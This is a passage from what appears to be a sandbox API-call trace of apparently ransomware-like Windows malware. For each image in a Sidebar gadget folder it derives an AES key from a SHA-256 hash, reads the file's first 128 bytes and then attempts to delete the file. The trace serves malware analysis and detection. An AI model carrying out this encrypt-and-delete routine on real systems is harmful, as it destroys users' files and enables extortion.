phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.326] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.326] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.326] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3dec [0189.326] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.331] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.331] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.331] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.333] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\4.png")) returned 0 [0189.334] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.335] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.335] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.335] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.335] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x61bd [0189.335] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.339] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.340] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.340] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.341] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\5.png")) returned 0 [0189.342] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.343] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.343] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.343] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.343] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6f20 [0189.343] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.359] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.359] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.359] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.361] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\6.png")) returned 0 [0189.362] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.363] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.363] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.363] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.363] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x493b [0189.363] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.367] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.367] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.367] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.370] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\7.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\7.png")) returned 0 [0189.371] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.372] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.372] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.372] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.372] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x52a7 [0189.372] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.377] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.377] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.377] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.379] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\8.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\8.png")) returned 0 [0189.380] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.381] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.381] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.381] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.381] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x531b [0189.381] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.385] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.385] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.385] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.387] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\9.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\9.png")) returned 0 [0189.388] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.389] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.389] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.389] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.389] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x46a9 [0189.389] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.395] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.395] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.395] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.397] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\background.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\background.png")) returned 0 [0189.400] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.401] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.401] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.401] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.401] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa3d5 [0189.401] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.601] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.601] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.601] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.603] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\daisies.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\daisies.png")) returned 0 [0189.603] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.604] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.604] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.604] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.604] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe9 [0189.604] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.605] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.605] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.605] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.607] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\glow.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\glow.png")) returned 0 [0189.665] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.665] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.665] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.665] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.665] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd75 [0189.665] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.692] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.692] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.692] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.693] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_down.png")) returned 0 [0189.694] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.694] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.694] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.694] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.694] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd04 [0189.695] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.697] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.697] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.697] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.698] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_over.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_over.png")) returned 0 [0189.699] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.700] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.700] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.700] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.700] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd35 [0189.700] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.702] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.702] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.702] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.703] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\hint_up.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\hint_up.png")) returned 0 [0189.704] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.704] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.704] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.704] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.704] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8c [0189.705] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.706] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.706] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.706] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.707] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_bottom.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_bottom.png")) returned 0 [0189.708] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.708] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.708] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.708] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.708] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x87 [0189.708] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.710] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.710] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.710] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.711] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_left.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_divider_left.png")) returned 0 [0189.711] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.712] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.712] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.712] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.712] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x87 [0189.712] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.714] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.714] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.714] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.715] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_divider_right.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_divider_right.png")) returned 0 [0189.715] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.716] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.716] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.716] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.716] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x89 [0189.716] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.718] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.718] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.718] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.719] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_left.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_left.png")) returned 0 [0189.719] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.720] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.720] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.720] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.720] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x89 [0189.720] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.722] CryptDestroyHash (hHash=0x284d528) returned 1 [0189.722] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.722] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.733] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_right.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_right.png")) returned 0 [0189.734] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.734] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.734] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.734] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.734] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x89 [0189.734] ReadFile (in: hFile=0x598, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.736] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0189.736] CryptDestroyKey (hKey=0x284d568) returned 1 [0189.736] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0189.737] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_box_top.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_box_top.png")) returned 0 [0189.738] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0189.738] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0189.738] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.738] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0189.738] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa8 [0189.738] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0189.740] 